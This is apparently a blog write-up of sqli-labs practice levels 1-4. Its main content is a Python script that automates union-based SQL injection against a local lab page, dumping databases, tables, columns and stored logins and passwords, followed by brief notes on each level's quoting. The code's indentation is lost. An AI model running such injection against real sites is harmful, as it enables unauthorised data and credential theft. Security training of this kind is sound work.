sqli1:

脚本

 # -*- coding: utf-8 -*-
"""
Created on Sat Mar 23 09:37:14 2019 @author: kenshin
""" import requests,re
url = 'http://localhost/sqli-labs/Less-1/?id=-1' def Len_OrderBy(url):
pattern_mark = 'Unknown column'
#假设字段长20
for i in range(1,20):
url_new = url + "\' order by "+ str(i) +"--+"
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
print('the lenght of column(order by) is :' + str(i-1) + "\n")
break
return i-1 def get_DB(url,lenght):
#注意:由此模式匹配到的是一个数量为1的列表,后续按','将数量拆分成n个,以便输出
pattern_mark = 'Your Login name:(.+?)<br>'
str = ''
for i in range(1,lenght):
str += 'group_concat(schema_name),'
str += 'group_concat(schema_name)'
payload = '\' union select ' + str +' from information_schema.schemata--+'
url += payload
r = requests.get(url)
r = re.findall(pattern_mark,r.text)
#list转str
str_tmp = "".join(r)
#re.split按','拆分
lst = re.split(',',str_tmp)
print('-'*9 + 'databases' + '-'*8)
for s in lst:
print('.' + s )
print('-'*25) def get_TB(url,lenght,db):
pattern_mark = 'Your Login name:(.+?)<br>'
str = ''
for i in range(1,lenght):
str += 'group_concat(table_name),'
str += 'group_concat(table_name)'
payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+"
url += payload
r = requests.get(url)
r = re.findall(pattern_mark,r.text)
#list转str
str_tmp = "".join(r)
#re.split按','拆分
lst = re.split(',',str_tmp)
print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8)
for s in lst:
print('.' + s )
print('-'*35) def get_Column(url,lenght,tb):
pattern_mark = 'Your Login name:(.+?)<br>'
str = ''
for i in range(1,lenght):
str += 'group_concat(column_name),'
str += 'group_concat(column_name)'
payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+"
url += payload
r = requests.get(url)
r = re.findall(pattern_mark,r.text)
#list转str
str_tmp = ''.join(r)
#re.split按','拆分
lst = re.split(',',str_tmp)
print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8)
for s in lst:
print('.' + s )
print('-'*35) def get_data(url,lenght,tb,data):
pattern_mark = 'Your Login name:(.+?)<br>'
pattern_mark_pass = 'Your Password:(.+?)</font>'
#if lenght=5
#data=a,b,c
#after expend
#data=a,b,c,4,5
#str to list
lst = data.split(",")
while len(lst) < lenght:
lst.append(str(len(lst)+1))
#list to str
sn = ''
for i in lst:
sn += i+","
#以上循环结果sn='a,b,c,' c后的‘,’舍去才能构造正确payload
sn=sn.rstrip(",")
#格式化输出结果
print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8)
#假设最多有100组数据
for i in range(1,100):
payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+"
url_new = url + payload
r = r_pass = requests.get(url_new)
r = re.findall(pattern_mark,r.text)
r_pass = re.findall(pattern_mark_pass,r_pass.text)
print(str(r) +" "*(16-len(str(r)))+"=> "+str(r_pass)+" "*(18-len(str(r_pass)))+"|")
if (len(r)==0 and len(r_pass)==0):
break
print("-"*41) #字段长度
lenght = Len_OrderBy(url)
#所有数据库
get_DB(url,lenght)
#由库爆表
db = input("select databases >> ")
get_TB(url,lenght,db)
#由表爆列
tb = input("select table >> ")
get_Column(url,3,tb)
#由表和列名爆数据
data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ")
get_data(url,lenght,tb,data)

脚本 1

sqli-labs:1-4,基于报错的注入-LMLPHP

sqli-labs:1-4,基于报错的注入-LMLPHP

sqli2:

与sqli1比较,少了 ',对id没有经过处理。

sqli-labs:1-4,基于报错的注入-LMLPHP

sqli3:

对id经过了')处理

sqli-labs:1-4,基于报错的注入-LMLPHP

 sqli4:

对id经过了")处理

sqli-labs:1-4,基于报错的注入-LMLPHP

05-11 16:59